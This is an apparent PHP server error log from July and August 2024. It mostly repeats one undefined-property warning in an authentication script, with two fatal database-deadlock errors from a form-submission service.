Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 10:49:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 22:30:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 23:14:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 23:54:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 00:54:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 01:27:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 02:09:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 02:09:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 02:33:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 03:33:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 03:35:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 04:53:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 05:03:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 05:18:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 05:26:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 05:29:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 06:07:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 06:24:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 07:24:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 08:23:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Jul-2024 23:19:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 01:01:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 02:07:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 03:03:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 03:08:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 04:00:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 05:18:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 05:20:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 05:58:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 06:23:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 08:13:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 08:14:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 11:51:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Jul-2024 23:48:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 00:35:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 00:58:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 01:03:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 01:58:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 02:29:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 02:35:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 02:49:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 03:07:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 04:47:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 05:19:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 06:11:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Jul-2024 08:28:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 05:42:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 14:25:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 14:27:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 14:27:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 15:40:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 15:40:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 15:41:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 16:00:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [07-Jul-2024 22:55:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 00:38:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 01:29:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 01:31:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 01:38:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 01:44:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 03:48:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 04:43:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 04:47:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 04:53:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 06:14:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 06:35:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 06:55:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:25:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:25:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:26:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:26:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:28:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:36:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 07:46:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 08:05:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 11:47:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Jul-2024 13:13:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Jul-2024 02:46:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Jul-2024 05:53:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Jul-2024 06:49:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 00:27:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 04:09:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 04:09:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 04:16:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 04:50:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 12:04:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 12:55:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 13:22:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 13:22:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 13:22:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Jul-2024 23:45:15 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/ftmgc76wdee4/public_html/pages/submit_form.php(37): TaskFormService->insertTaskForm() #3 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [10-Jul-2024 23:45:15 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/ftmgc76wdee4/public_html/pages/submit_form.php(37): TaskFormService->insertTaskForm() #3 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [11-Jul-2024 01:59:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 02:17:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 02:53:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 03:20:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 04:20:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 06:29:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 06:48:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 06:55:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 06:55:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [11-Jul-2024 09:18:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 03:12:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 03:57:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:16:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:26:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:26:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:34:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 04:34:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 05:13:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 05:15:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 06:51:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 08:49:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 12:15:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 12:19:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [12-Jul-2024 12:22:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Jul-2024 06:11:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Jul-2024 07:02:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Jul-2024 10:40:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Jul-2024 14:37:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 00:35:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 00:36:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 01:39:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 02:06:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 04:15:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 04:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 05:32:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 05:54:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 06:57:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 07:02:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:01:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:16:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:16:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:16:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 14:17:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Jul-2024 17:06:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 03:18:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 06:15:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 06:47:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 06:51:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 09:03:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Jul-2024 22:11:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 03:10:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 03:14:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 03:20:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 03:57:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 04:57:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 05:03:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 05:29:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 05:54:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 05:56:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 06:04:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 06:12:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 06:43:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 11:15:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 11:21:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 11:22:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 11:23:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Jul-2024 23:17:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Jul-2024 04:49:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Jul-2024 07:25:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Jul-2024 08:51:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Jul-2024 00:13:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Jul-2024 03:21:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Jul-2024 12:25:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Jul-2024 03:52:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Jul-2024 06:58:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Jul-2024 04:35:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Jul-2024 22:49:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [25-Jul-2024 22:52:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [26-Jul-2024 01:20:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [28-Jul-2024 00:27:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jul-2024 04:49:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jul-2024 05:34:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jul-2024 12:09:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jul-2024 12:32:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jul-2024 08:00:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jul-2024 09:44:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [31-Jul-2024 05:21:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [31-Jul-2024 08:12:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [31-Jul-2024 09:50:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [31-Jul-2024 14:06:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 04:48:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 08:39:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 08:58:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 09:00:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 10:37:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 11:59:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Aug-2024 12:56:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Aug-2024 07:51:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [05-Aug-2024 07:52:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Aug-2024 06:16:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [06-Aug-2024 11:25:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [08-Aug-2024 01:38:17 UTC] PHP Warning: Undefined property: stdClass::$status 